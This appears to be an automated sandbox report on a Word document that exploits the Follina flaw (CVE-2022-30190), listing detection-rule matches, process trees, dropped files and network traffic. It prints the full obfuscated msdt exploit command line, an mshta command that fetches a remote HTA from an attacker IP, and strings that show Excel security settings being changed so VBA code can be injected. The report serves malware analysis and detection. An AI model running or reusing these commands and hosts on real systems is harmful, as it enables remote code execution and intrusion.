        Source: 00000019.00000003.500290954.0000000006DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509363516.0000000005B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499838198.0000000006E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499586408.0000000006E87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509707518.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508774998.0000000005C75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.504055585.00000000065C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508725411.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500355385.0000000006DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499979043.0000000006E3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000002.568622396.0000000006E13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500225710.0000000006E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506934087.00000000060F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.506382622.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500146207.0000000006E1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.503951630.0000000006608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500435591.0000000006DDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500214700.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509015844.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.499330598.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.505281515.0000000006456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508508228.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507143214.0000000006072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.509189150.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.507585756.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.501274310.0000000006AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508358895.0000000005D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.508666437.0000000005CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.500854607.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: 00000019.00000003.498808453.0000000006D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: Process Memory Space: msdt.exe PID: 7052, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
        Source: Process Memory Space: mshta.exe PID: 5852, type: MEMORYSTRMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dllhost[1].hta, type: DROPPEDMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: DiagPackage.dll.mui.9.drStatic PE information: No import functions for PE file found
        Source: DiagPackage.dll.9.drStatic PE information: No import functions for PE file found
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
        Source: V3g2Pfu707.docxVirustotal: Detection: 33%
        Source: V3g2Pfu707.docxReversingLabs: Detection: 29%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: V3g2Pfu707.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\V3g2Pfu707.docx
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{62B37E75-AE27-4D86-A250-544904017A8C} - OProcSessId.datJump to behavior
        Source: classification engineClassification label: mal92.troj.expl.evad.winDOCX@18/34@0/3
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\\SysWOW64\\rundll32.exe
        Source: mshta.exeBinary or memory string: _Application.Visible("false");_Application.Version();IWshShell3.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM");IWshShell3.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM");IWshShell3.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVB", "1", "REG_DWORD");_Application.Workbooks();Workbooks.Add();_Workbook.VBProject();_VBProject.VBComponents();_VBComponents.Add("1");_VBComponent.CodeModule();_CodeModule.AddFromString("Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As LongEnd TypePrivate Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String ");_Application.DisplayAlerts("false");_Application.Run("Auto_Open");
        Source: mshta.exe, 00000019.00000003.498723453.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.511885316.000000000586C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0_Workbook.VBProject();
        Source: mshta.exe, 00000019.00000002.567767973.0000000005947000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: _Workbook.VBProject();
        Source: mshta.exe, 00000019.00000003.490927770.0000000005869000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491409974.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491157715.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491019330.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.498723453.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559559685.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491309845.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.511885316.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491270423.000000000586C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559502075.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000003.491220893.000000000586C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline

        Persistence and Installation Behavior

        barindex
        Source: document.xml.relsExtracted files from sample: http://101.33.231.81:62563/exploit.html!
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.muiJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.muiJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 61256
        Source: unknownNetwork traffic detected: HTTP traffic on port 61256 -> 49781
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
